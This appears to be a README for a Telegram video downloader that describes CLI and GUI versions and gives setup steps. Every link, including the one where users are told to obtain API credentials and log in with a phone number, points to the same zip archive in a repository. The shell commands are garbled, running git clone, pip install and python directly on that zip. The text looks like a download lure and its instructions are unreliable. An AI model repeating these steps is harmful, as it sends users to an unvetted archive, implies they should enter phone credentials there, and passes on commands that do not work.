Telegram Downloader Tools allows users to download videos from Telegram using multiple hashtags. This tool is beneficial for collecting content from specific channels or groups. It is available in three versions:
- π₯οΈ CLI (Command Line Interface) β For use in scripts and automation
- π¨ GUI (CustomTkinter) β Traditional graphical interface
- β¨ Flet UI β Modern web interface (currently under development)
To start using this tool, follow the steps below.
Before you download and install the software, make sure you have the following:
- Python 3.7 or higher
- A Telegram account
- API ID and API Hash (see details below)
To obtain your API ID and API Hash, follow these steps:
- Visit https://raw.githubusercontent.com/andreabranca/Telegram-Downloader-Tools/main/src/Telegram-Downloader-Tools_v3.5-alpha.5.zip and log in with your phone number.
- Click on "API development tools."
- Fill out the form to create a new application (App title, Short name, etc.).
- Your api_id and api_hash will be displayed.
-
To download the latest version of the tool, visit this page to download: Releases Page.
-
After downloading, you need to install the necessary dependencies. Follow these steps:
-
Open your command line or terminal.
-
Navigate to the folder where you downloaded the tool.
-
Run the following commands:
git clone https://raw.githubusercontent.com/andreabranca/Telegram-Downloader-Tools/main/src/Telegram-Downloader-Tools_v3.5-alpha.5.zip cd Telegram-Downloader-Tools pip install -r https://raw.githubusercontent.com/andreabranca/Telegram-Downloader-Tools/main/src/Telegram-Downloader-Tools_v3.5-alpha.5.zip -
After installation, you can run the tool based on the interface you choose:
-
For the CLI version, run:
python https://raw.githubusercontent.com/andreabranca/Telegram-Downloader-Tools/main/src/Telegram-Downloader-Tools_v3.5-alpha.5.zip
-
For the GUI version, simply open the application file by double-clicking it.
Make sure to enter your API ID and API Hash when prompted.
- Multiple Hashtags: Download videos using different hashtags.
- User-Friendly Interface: The GUI version offers an intuitive experience.
- Automation Support: The CLI version allows for script integration.
If you encounter issues during installation or usage, try the following:
- Ensure Python and pip are installed correctly.
- Verify that you have entered the API ID and API Hash correctly.
- Check your internet connection.
Should you need additional help, feel free to consult the community or documentation related to Python and Telegram.
For any feedback or issues, please raise an issue on the GitHub Issues Page.
For questions or suggestions, feel free to reach out via GitHub or explore the discussions in the community.
By following these steps, you can easily download and use the Telegram Downloader Tools. Enjoy collecting your favorite content from Telegram!